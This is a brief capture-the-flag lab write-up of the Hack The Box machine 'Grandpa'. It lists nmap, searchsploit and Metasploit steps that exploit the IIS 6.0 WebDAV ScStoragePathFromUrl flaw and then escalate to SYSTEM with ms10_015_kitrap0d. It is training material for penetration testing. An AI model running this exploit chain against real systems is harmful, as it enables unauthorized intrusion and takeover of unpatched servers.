HTB 9. Grandpa

  1. nmap -T4 -A -p- shows 80 open with version Microsoft IIS httpd 6.0 (dated version) and poentially risky methods (TRACE and `PUT)

  2. Go to shows "Under Construction" page.

  3. searchsploit ScStoragePathFromUrl shows python and ruby modules.

  4. Metasploit

    use exploit/windows/iis/iis_webdav_scstoragepathfromurl
    set rhost
    set lport 5555
    show targets

    Try running again (4 times)

  5. We are not system. ps to show processes. Pick a process that has NT AUTHORITY\NETWORK SERVICE with migrate 1788 and success.

  6. Priv esc suggester:

    search suggester
    use 0
    set session 1

    Result: 9 options, go down list and try to see what works

  7. start with ms10_015_kitrap0d and set lhost tun0

  8. getuid is NT AUTHORITY\SYSTEM.

Last updated